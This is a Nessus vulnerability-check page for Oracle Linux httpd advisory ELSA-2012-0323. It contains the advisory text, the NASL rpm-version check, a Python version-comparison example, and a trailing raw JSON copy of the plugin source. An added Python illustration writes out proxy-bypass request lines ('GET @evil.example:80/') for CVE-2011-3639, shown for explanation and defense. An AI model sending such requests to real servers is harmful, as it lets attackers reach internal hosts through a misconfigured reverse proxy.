ID ORACLELINUX_ELSA-2012-0323.NASL Type nessus Reporter Tenable Modified 2018-07-18T00:00:00
Description
From Red Hat Security Advisory 2012:0323 :
Updated httpd packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
moderate security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.
The Apache HTTP Server is a popular web server.
It was discovered that the fix for CVE-2011-3368 (released via
RHSA-2011:1392) did not completely address the problem. An attacker
could bypass the fix and make a reverse proxy connect to an arbitrary
server not directly accessible to the attacker by sending an HTTP
version 0.9 request. (CVE-2011-3639)
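The following Python is an added illustration, not part of the Red Hat advisory or the Nessus plugin: it models the decision behind CVE-2011-3368 and its incomplete fix rather than reproducing httpd's C request parser. The backend name `backend.internal`, the attacker host `evil.example`, the request lines and the function names are all assumptions for the example. The vulnerable configuration shape is an unanchored proxy rule such as `RewriteRule ^(.*) http://backend.internal$1 [P]`, which appends the request-URI verbatim to the backend URL; a request-URI starting with `@` then turns the backend name into userinfo and the connection goes to the attacker-chosen host.

```python
from urllib.parse import urlsplit

# Hypothetical reverse-proxy target of an unanchored rule such as
#   RewriteRule ^(.*) http://backend.internal$1 [P]
# The request-URI is appended to this string without any check.
BACKEND = "http://backend.internal"


def parse_request_line(line):
    """Split a raw request line into (method, request_uri, version).

    An HTTP/0.9 "simple request" is just "METHOD URI" with no version token,
    which is the request form the advisory says bypassed the first fix.
    """
    parts = line.strip().split(" ")
    if len(parts) == 3:
        return parts[0], parts[1], parts[2]
    if len(parts) == 2:
        return parts[0], parts[1], "HTTP/0.9"
    raise ValueError("malformed request line: %r" % line)


def rewrite_target(request_uri):
    """What the unanchored rule above hands to mod_proxy."""
    return BACKEND + request_uri


def proxied_host(target_url):
    """Host the proxy would actually connect to for the rewritten URL.

    Everything before '@' in the authority is userinfo, so
    'http://backend.internal@evil.example:80/' connects to evil.example.
    """
    return urlsplit(target_url).hostname


def target_after_first_fix(line):
    """Model of the CVE-2011-3368 fix as the advisory describes its gap:
    request-URIs that are not an absolute path are rejected, but only for
    requests that carry an HTTP version, so an HTTP/0.9 request slips
    through.  Returns None when the request is rejected."""
    _method, uri, version = parse_request_line(line)
    if version != "HTTP/0.9" and not uri.startswith("/"):
        return None
    return rewrite_target(uri)


def target_after_complete_fix(line):
    """Model of the CVE-2011-3639 fix: the same absolute-path check applied
    to every request form, HTTP/0.9 included."""
    _method, uri, _version = parse_request_line(line)
    if not uri.startswith("/"):
        return None
    return rewrite_target(uri)


if __name__ == "__main__":
    # Constructed attack request lines for the example (not captured traffic).
    for line in ("GET @evil.example:80/ HTTP/1.0", "GET @evil.example:80/"):
        for check in (target_after_first_fix, target_after_complete_fix):
            target = check(line)
            host = proxied_host(target) if target else "rejected"
            print("%-26s %-32s -> %s" % (check.__name__, line, host))
```

Running the block shows the HTTP/1.0 form rejected by both models and the HTTP/0.9 form reaching evil.example under the first fix only. Besides installing the updated package, it is worth checking that RewriteRule and ProxyPassMatch patterns feeding a proxy are anchored with a leading slash (`^/(.*)`), since a pattern that can match a request-URI not beginning with `/` is what makes this class of request useful to an attacker.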
The httpd server included the full HTTP header line in the default
error page generated when receiving an excessively long or malformed
header. Malicious JavaScript running in the server's domain context
could use this flaw to gain access to httpOnly cookies.
(CVE-2012-0053)
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way httpd performed substitutions in regular expressions.
An attacker able to set certain httpd settings, such as a user
permitted to override the httpd configuration for a specific directory
using a '.htaccess' file, could use this flaw to crash the httpd child
process or, possibly, execute arbitrary code with the privileges of
the 'apache' user. (CVE-2011-3607)
A flaw was found in the way httpd handled child process status
information. A malicious program running with httpd child process
privileges (such as a PHP or CGI script) could use this flaw to cause
the parent httpd process to crash during httpd service shutdown.
(CVE-2012-0031)
All httpd users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing
the updated packages, the httpd daemon will be restarted
automatically.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2012:0323 and
# Oracle Linux Security Advisory ELSA-2012-0323 respectively.
#
include("compat.inc");

if (description)
{
  script_id(68488);
  script_version("1.6");
  script_cvs_date("Date: 2018/07/18 17:43:56");

  script_cve_id("CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053");
  script_bugtraq_id(50322, 50494, 51407, 51706, 51869);
  script_xref(name:"RHSA", value:"2012:0323");

  script_name(english:"Oracle Linux 5 : httpd (ELSA-2012-0323)");
  script_summary(english:"Checks rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Oracle Linux host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"From Red Hat Security Advisory 2012:0323 :

Updated httpd packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 5.

The Red Hat Security Response Team has rated this update as having
moderate security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.

The Apache HTTP Server is a popular web server.

It was discovered that the fix for CVE-2011-3368 (released via
RHSA-2011:1392) did not completely address the problem. An attacker
could bypass the fix and make a reverse proxy connect to an arbitrary
server not directly accessible to the attacker by sending an HTTP
version 0.9 request. (CVE-2011-3639)

The httpd server included the full HTTP header line in the default
error page generated when receiving an excessively long or malformed
header. Malicious JavaScript running in the server's domain context
could use this flaw to gain access to httpOnly cookies.
(CVE-2012-0053)

An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way httpd performed substitutions in regular expressions.
An attacker able to set certain httpd settings, such as a user
permitted to override the httpd configuration for a specific directory
using a '.htaccess' file, could use this flaw to crash the httpd child
process or, possibly, execute arbitrary code with the privileges of
the 'apache' user. (CVE-2011-3607)

A flaw was found in the way httpd handled child process status
information. A malicious program running with httpd child process
privileges (such as a PHP or CGI script) could use this flaw to cause
the parent httpd process to crash during httpd service shutdown.
(CVE-2012-0031)

All httpd users should upgrade to these updated packages, which
contain backported patches to correct these issues. After installing
the updated packages, the httpd daemon will be restarted
automatically."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Update the affected httpd packages."
  );
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploithub_sku", value:"EH-14-410");
  script_set_attribute(attribute:"exploit_framework_exploithub", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:httpd");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:httpd-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:httpd-manual");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:oracle:linux:mod_ssl");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:oracle:linux:5");

  script_set_attribute(attribute:"patch_publication_date", value:"2012/03/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/07/12");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.");
  script_family(english:"Oracle Linux Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/OracleLinux", "Host/RedHat/release", "Host/RedHat/rpm-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("rpm.inc");


# This is a local check: it needs the release string and rpm package list that
# ssh_get_info.nasl collects over SSH. Without them, exit with an audit message
# instead of silently reporting the host as clean.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/OracleLinux")) audit(AUDIT_OS_NOT, "Oracle Linux");
# Oracle Linux publishes its release string under the Red Hat key; the fixed
# packages below are for release 5 only, so any other major version is skipped.
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || !eregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux)", string:release)) audit(AUDIT_OS_NOT, "Oracle Linux");
os_ver = eregmatch(pattern: "Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Oracle Linux");
os_ver = os_ver[1];
if (! ereg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Oracle Linux 5", "Oracle Linux " + os_ver);

if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Only the i386, x86_64 and ia64 builds are known to this plugin; any other
# architecture is reported as not checked rather than as not affected.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && "ia64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Oracle Linux", cpu);

# One rpm_check() per package shipped in ELSA-2012-0323. Each call flags an
# installed package whose version-release sorts below 2.2.3-63.0.1.el5_8.1 and
# ignores packages that are not installed at all.
flag = 0;
if (rpm_check(release:"EL5", reference:"httpd-2.2.3-63.0.1.el5_8.1")) flag++;
if (rpm_check(release:"EL5", reference:"httpd-devel-2.2.3-63.0.1.el5_8.1")) flag++;
if (rpm_check(release:"EL5", reference:"httpd-manual-2.2.3-63.0.1.el5_8.1")) flag++;
if (rpm_check(release:"EL5", reference:"mod_ssl-2.2.3-63.0.1.el5_8.1")) flag++;


if (flag)
{
  # Medium severity finding; with verbose reporting the installed and fixed
  # versions of each flagged package are listed in the plugin output.
  if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());
  else security_warning(0);
  exit(0);
}
else
{
  # Distinguish "installed and already fixed" from "not installed at all".
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "httpd / httpd-devel / httpd-manual / mod_ssl");
}
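The plugin's verdict rests entirely on comparing the installed version-release of each package against the fixed build 2.2.3-63.0.1.el5_8.1. The Python below is an added example, not Tenable's rpm.inc: it reimplements the ordering rpm itself uses (the rpmvercmp algorithm: digit runs compare numerically, letter runs as strings, numeric beats alphabetic, `~` sorts before everything) and runs it over a constructed `rpm -qa` listing in the same way the four rpm_check() calls do. SAMPLE_RPM_LIST is made up for the example, epochs are not handled, and rpm_check()'s release and architecture handling is left out.

```python
import re

# Fixed builds taken from the plugin's rpm_check() calls above.
FIXED_BUILDS = [
    "httpd-2.2.3-63.0.1.el5_8.1",
    "httpd-devel-2.2.3-63.0.1.el5_8.1",
    "httpd-manual-2.2.3-63.0.1.el5_8.1",
    "mod_ssl-2.2.3-63.0.1.el5_8.1",
]

# Constructed `rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}\n'` output for the
# example: httpd and mod_ssl lag behind the fix, httpd-manual is already
# current, httpd-devel is not installed, openssl is unrelated.
SAMPLE_RPM_LIST = """\
httpd-2.2.3-53.0.1.el5_7.3
mod_ssl-2.2.3-53.0.1.el5_7.3
httpd-manual-2.2.3-63.0.1.el5_8.1
openssl-0.9.8e-22.el5_8.1
"""


def rpmvercmp(a, b):
    """Order two RPM version or release strings like rpm's rpmvercmp().

    Returns -1, 0 or 1.  Both strings are walked segment by segment; anything
    that is neither ASCII alphanumeric nor '~' is only a separator.
    """
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and not (a[i].isalnum() or a[i] == "~"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] == "~"):
            j += 1
        # '~' (pre-release marker) sorts before anything, even end of string
        a_tilde = i < len(a) and a[i] == "~"
        b_tilde = j < len(b) and b[j] == "~"
        if a_tilde or b_tilde:
            if not a_tilde:
                return 1
            if not b_tilde:
                return -1
            i += 1
            j += 1
            continue
        if i >= len(a) or j >= len(b):
            break
        # next segment is all digits or all letters, never mixed
        if a[i].isdigit():
            isnum = True
            seg_a = re.match(r"[0-9]+", a[i:]).group(0)
            m = re.match(r"[0-9]+", b[j:])
        else:
            isnum = False
            seg_a = re.match(r"[A-Za-z]+", a[i:]).group(0)
            m = re.match(r"[A-Za-z]+", b[j:])
        if m is None:
            return 1 if isnum else -1   # numeric segment beats alphabetic
        seg_b = m.group(0)
        i += len(seg_a)
        j += len(seg_b)
        if isnum:
            seg_a, seg_b = seg_a.lstrip("0"), seg_b.lstrip("0")
            if len(seg_a) != len(seg_b):
                return 1 if len(seg_a) > len(seg_b) else -1
        if seg_a != seg_b:
            return 1 if seg_a > seg_b else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1  # whoever has segments left is newer


def split_nvr(pkg):
    """'httpd-devel-2.2.3-63.0.1.el5_8.1' -> ('httpd-devel', '2.2.3', '63.0.1.el5_8.1').
    Names may contain '-', so version and release are split off from the right."""
    name_ver, _, release = pkg.rpartition("-")
    name, _, version = name_ver.rpartition("-")
    return name, version, release


def is_older(installed, fixed):
    """True when `installed` is the same package as `fixed` at an older version-release."""
    n1, v1, r1 = split_nvr(installed)
    n2, v2, r2 = split_nvr(fixed)
    if n1 != n2:
        raise ValueError("different packages: %s vs %s" % (n1, n2))
    return (rpmvercmp(v1, v2) or rpmvercmp(r1, r2)) < 0


def missing_updates(rpm_list, fixed_builds):
    """Mirror the plugin's loop: (installed, fixed) for each package older than its fix."""
    installed = {split_nvr(p)[0]: p for p in rpm_list.split()}
    findings = []
    for fixed in fixed_builds:
        name = split_nvr(fixed)[0]
        if name in installed and is_older(installed[name], fixed):
            findings.append((installed[name], fixed))
    return findings


if __name__ == "__main__":
    for have, want in missing_updates(SAMPLE_RPM_LIST, FIXED_BUILDS):
        print("vulnerable: %s (fixed in %s)" % (have, want))
```

Feeding real `rpm -qa` output through missing_updates() gives the same two-way split the plugin reports: packages that are installed and older are findings, packages that are absent produce nothing, which is why the plugin ends with separate "not affected" and "not installed" audit messages.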
Published 2013-07-12T00:00:00 CVSS 4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P) Plugin https://www.tenable.com/plugins/index.php?view=single&id=68488
script_cvs_date(\"$Date: 2015/12/01 17:07:15 $\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_osvdb_id(76744, 77444, 78293, 78556);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. 
Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"httpd-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-devel-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"httpd-manual-2.2.3-63.0.1.el5_8.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"mod_ssl-2.2.3-63.0.1.el5_8.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / mod_ssl\");\n}\n", "title": "Oracle Linux 5 : httpd (ELSA-2012-0323)", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:23:03"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:mod_ssl", "p-cpe:/a:oracle:linux:httpd-manual"], "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1392) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. 
After installing the updated packages, the httpd daemon will be restarted automatically.", "edition": 4, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "ab49aeb14da9d767c5b0def968c6305f5b4df93fab2ff3a03bdc407f34650da3", "hashmap": [{"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "ba5421b34c575442e1dfc9eefc2b01f3", "key": "title"}, {"hash": "9d4ba84f3eb908a12ad8af29607f5852", "key": "description"}, {"hash": "3c09fd39dca9bce8dafe505ecf682fca", "key": "href"}, {"hash": "2e3c438f66403fd816adabf5a1b82b29", "key": "modified"}, {"hash": "a32f25318843d8ff315ab9875d6d2ee1", "key": "sourceData"}, {"hash": "8f7ef314d920891c344985cdc4f824f1", "key": "cpe"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "21d1eb58c85fb6f05d58534760094021", "key": "references"}, {"hash": "16ae3c93dc83302d463471eefbc44076", "key": "cvelist"}, {"hash": "7d77095f188ad2b45d2c83a576a305e2", "key": "pluginID"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=68488", "id": "ORACLELINUX_ELSA-2012-0323.NASL", "lastseen": "2018-08-30T19:29:45", "modified": "2018-07-18T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "68488", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0323 and \n# Oracle Linux Security Advisory ELSA-2012-0323 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68488);\n 
script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50322, 50494, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0323\");\n\n script_name(english:\"Oracle Linux 5 : httpd (ELSA-2012-0323)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2012:0323 :\n\nUpdated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request. (CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. 
Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-March/002683.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
